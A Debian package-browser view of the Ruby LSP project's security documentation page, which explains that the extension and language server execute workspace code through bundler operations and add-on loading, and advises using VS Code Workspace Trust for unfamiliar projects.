File: security.markdown

package info (click to toggle)
ruby-ruby-lsp 0.26.7-1
  • links: PTS, VCS
  • area: main
  • in suites: forky, sid
  • size: 27,676 kB
  • sloc: ruby: 35,294; javascript: 29; sh: 7; makefile: 4
file content (54 lines) | stat: -rw-r--r-- 2,424 bytes parent folder | download 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
 
---
layout: default
title: Security
nav_order: 25
---

# Security

This page documents potential risks when using the Ruby LSP VS Code extension and the Ruby LSP language server with untrusted code.

## Trust Model

**Ruby LSP assumes that all code in your workspace (including dependencies) is trusted.**

When you open a project with Ruby LSP, the extension and language server will execute code from that project as part of
normal operation. This is fundamentally similar to running `bundle install` in that project directory.

If you are working with code you do not fully trust, you should be aware of the potential risks documented below.

## Code Execution Vectors

The following is a non-exhaustive list of ways that Ruby LSP may execute code from your workspace:

### Bundle Installation

Ruby LSP automatically performs bundler operations (e.g. `bundle install`, `bundle update`) when starting up or when detecting changes to your
Gemfile. This will:

- Execute any code in your Gemfile (Gemfiles are Ruby code)
- Install gems specified in the Gemfile, which may include native extensions that execute during installation
- Run any post-install hooks defined by gems

### Add-ons / Plugins

Ruby LSP has an add-on system that automatically discovers and loads add-ons from:

- Gems in your bundle that contain `ruby_lsp/**/addon.rb` files
- Files matching `ruby_lsp/**/addon.rb` anywhere in your workspace

Add-ons are loaded via `require` and their `activate` method is called, allowing them to execute arbitrary Ruby code.
This is by design - add-ons can spawn processes, make network requests, or perform any other operation.

## Recommendations

1. **Understand what "Trust" means** - Trusting a project with Ruby LSP installed is equivalent to feeling comfortable running `bundle install` in that directory.
2. **Understand [VS Code's Workspace Trust](https://code.visualstudio.com/docs/editor/workspace-trust)** - When opening unfamiliar projects, click "Don't Trust" on the workspace trust prompt.
   Ruby LSP will not run in untrusted workspaces, eliminating any risk.
3. **Be cautious with unfamiliar add-ons** - Add-ons have full access to your system when activated.

## Reporting Security Issues

If you discover a security vulnerability in Ruby LSP, please report it through
[GitHub Security Advisories](https://github.com/Shopify/ruby-lsp/security/advisories/new) rather than opening a public
issue.